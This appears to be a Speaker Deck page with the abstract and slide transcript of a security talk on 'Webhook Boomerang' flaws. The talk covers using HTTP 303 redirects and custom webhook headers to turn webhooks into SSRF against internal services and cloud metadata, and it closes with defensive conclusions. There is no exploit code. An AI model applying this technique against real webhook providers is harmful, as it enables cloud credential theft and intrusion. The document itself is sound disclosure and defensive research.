Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Hook, Line and Sinker - Pillaging API Webhooks

Hook, Line and Sinker - Pillaging API Webhooks

Webhooks are an important part of modern web services and event-driven applications. They are defined as “user-defined HTTP callbacks”, and are triggered by some events, such as pushing code to a repo or adding a new customer entry in a CRM tool. Webhooks are ubiquitous and gaining in popularity owing to their asynchronous nature and the integration possibilities that they engender.
Webhooks are seen as “harmless”, owing to their “one-way” orientation. They are perceived as such, because they typically post some event information to a URL and they are done once they receive an HTTP response.

In this talk, I will demonstrate a series of attacks that we dub “Webhook Boomerang flaws”. These flaws allow attackers to leverage webhooks to create a boomerang effect that ends up attacking the originating web service itself. The techniques showcased in this talk will highlight a unique set of attack vectors that piggyback on nothing more than the standard HTTP and DNS protocols, which allow us to to perform Server-side Request Forgery style attacks that can lead to cloud-metadata compromise even with security protections like Metadata Headers. In our research, we’ve discovered this across multiple cloud providers and found that these attacks can be used in more conventional SSRF compromises of internal web-services.

Abhay Bhargav

March 29, 2022
Tweet

More Decks by Abhay Bhargav

Other Decks in Technology

Transcript

  1. abhaybhargav Hook, Line and Sinker Pillaging API Webhooks Abhay Bhargav

  2. abhaybhargav Yours Truly • Founder @ we45 • Chief Research

    O ffi cer - AppSecEngineer • AppSec Automation Junkie • Trainer/Speaker at DEF CON, BlackHat, OWASP Events, etc world-wide • Lead Trainer - we45 Training and Workshops • Co-author of Secure Java For Web Application Development • Author of PCI Compliance: A De fi nitive Guide
  3. abhaybhargav Community Initiatives • Youtube Channel: AppSecEngineer • Blog: abhaybhargav.com

  4. abhaybhargav My talk…

  5. abhaybhargav My talk…

  6. abhaybhargav My talk…

  7. abhaybhargav Agenda

  8. abhaybhargav Agenda • What are webhooks? How do they work?

  9. abhaybhargav Agenda • What are webhooks? How do they work?

    • Common Webhook Attack Patterns
  10. abhaybhargav Agenda • What are webhooks? How do they work?

    • Common Webhook Attack Patterns • SSRF: A Gentle introduction
  11. abhaybhargav Agenda • What are webhooks? How do they work?

    • Common Webhook Attack Patterns • SSRF: A Gentle introduction • Webhook Boomerang Flaws
  12. abhaybhargav Agenda • What are webhooks? How do they work?

    • Common Webhook Attack Patterns • SSRF: A Gentle introduction • Webhook Boomerang Flaws • Interesting Sub-variants
  13. abhaybhargav So you’re building an API…

  14. abhaybhargav You probably need webhooks…

  15. abhaybhargav What are they?

  16. abhaybhargav Webhooks a.k.a “User Generated Callbacks”

  17. abhaybhargav Webhooks are everywhere!

  18. abhaybhargav Common Webhook Traits

  19. abhaybhargav Natural Attack Focus/Assumptions

  20. abhaybhargav Our Focus…

  21. abhaybhargav Our Focus… Can I compromise the Provider? 🤔

  22. abhaybhargav Can I…?

  23. abhaybhargav Can I…?

  24. abhaybhargav Can I…?

  25. abhaybhargav Can I…?

  26. abhaybhargav Can I…?

  27. abhaybhargav Can I…? Webhook request

  28. abhaybhargav Can I…? Webhook request

  29. abhaybhargav Can I…? Webhook request Attacks the Provider

  30. abhaybhargav Can I…? Webhook request Attacks the Provider 😈

  31. abhaybhargav This can only mean….

  32. abhaybhargav SSRF!

  33. abhaybhargav What is SSRF?

  34. abhaybhargav SSRF - Real-world Examples

  35. abhaybhargav SSRF - Real-world Examples

  36. abhaybhargav SSRF - Real-world Examples

  37. abhaybhargav SSRF - Real-world Examples

  38. abhaybhargav SSRF - Real-world Examples

  39. abhaybhargav SSRF - Real-world Examples

  40. abhaybhargav SSRF - Real-world Examples

  41. abhaybhargav Effects and Impact of SSRF

  42. abhaybhargav What we want….

  43. abhaybhargav What we want….

  44. abhaybhargav What we want….

  45. abhaybhargav What we want….

  46. abhaybhargav What we want….

  47. abhaybhargav What we want…. Webhook request

  48. abhaybhargav What we want…. Webhook request

  49. abhaybhargav What we want…. Webhook request Redirects to Internal/Metadata URL

  50. abhaybhargav What we want…. Webhook request Redirects to Internal/Metadata URL

    😈
  51. abhaybhargav But there’s a problem….

  52. abhaybhargav SSRF works… • When there’s a GET request involved

    • Most Webhooks make POST requests (some PUT cases as well) • That are di ffi cult to weaponize as an SSRF • Most 3XX Redirects require clients NOT to follow redirects
  53. abhaybhargav SSRF works… • When there’s a GET request involved

    • Most Webhooks make POST requests (some PUT cases as well) • That are di ffi cult to weaponize as an SSRF • Most 3XX Redirects require clients NOT to follow redirects
  54. abhaybhargav

  55. abhaybhargav HTTP 303 See other • Is a response that

    can be triggered for an originated POST/PUT request • Usually used when a resource has been replaced • Redirect response is a GET (which works for us) • Prompts clients to follow with a GET request to the speci fi ed location
  56. abhaybhargav What we want….

  57. abhaybhargav What we want….

  58. abhaybhargav What we want….

  59. abhaybhargav What we want….

  60. abhaybhargav What we want….

  61. abhaybhargav What we want…. Webhook POST request

  62. abhaybhargav What we want…. Webhook POST request

  63. abhaybhargav What we want…. Webhook POST request HTTP 303 Redirect

    to Metadata/Internal Service
  64. abhaybhargav What we want…. Webhook POST request HTTP 303 Redirect

    to Metadata/Internal Service 😈
  65. abhaybhargav What we want…. Webhook POST request HTTP 303 Redirect

    to Metadata/Internal Service 😈 GET request to Metadata/Internal URL
  66. abhaybhargav How we used this on Docker…

  67. abhaybhargav

  68. abhaybhargav

  69. abhaybhargav

  70. abhaybhargav

  71. abhaybhargav

  72. abhaybhargav

  73. abhaybhargav

  74. abhaybhargav

  75. abhaybhargav

  76. abhaybhargav

  77. abhaybhargav

  78. abhaybhargav

  79. abhaybhargav

  80. abhaybhargav

  81. abhaybhargav

  82. abhaybhargav Demo time

  83. abhaybhargav Needless to say!

  84. abhaybhargav Needless to say!

  85. abhaybhargav Needless to say!

  86. abhaybhargav Needless to say!

  87. abhaybhargav So what?

  88. abhaybhargav Custom Headers FTW! • Several apps (providers) allow you

    to con fi gure custom headers for Webhooks • So all you have to do now is use Cloud Metadata Headers in the Custom Headers and you’re in!
  89. abhaybhargav Custom headers FTW!

  90. abhaybhargav App Level IP Blocklisting?

  91. abhaybhargav Defense

  92. abhaybhargav Conclusions

  93. abhaybhargav Conclusions • Webhooks are a powerful way to integrate

    your apps with others
  94. abhaybhargav Conclusions • Webhooks are a powerful way to integrate

    your apps with others • Also a powerful way to get attacked with “Boomerang Attacks”
  95. abhaybhargav Conclusions • Webhooks are a powerful way to integrate

    your apps with others • Also a powerful way to get attacked with “Boomerang Attacks” • Consider webhooks in your threat model - multiple attack angles
  96. abhaybhargav Conclusions • Webhooks are a powerful way to integrate

    your apps with others • Also a powerful way to get attacked with “Boomerang Attacks” • Consider webhooks in your threat model - multiple attack angles • SSRF is an attacker’s good friend
  97. abhaybhargav Conclusions • Webhooks are a powerful way to integrate

    your apps with others • Also a powerful way to get attacked with “Boomerang Attacks” • Consider webhooks in your threat model - multiple attack angles • SSRF is an attacker’s good friend • Look at defense holistically, and from multiple layers
  98. abhaybhargav Thank you • Twitter: @abhaybhargav, @AppSecEngineer, @we45 • Youtube:

    AppSecEngineer • Website: appsecengineer.com, we45.com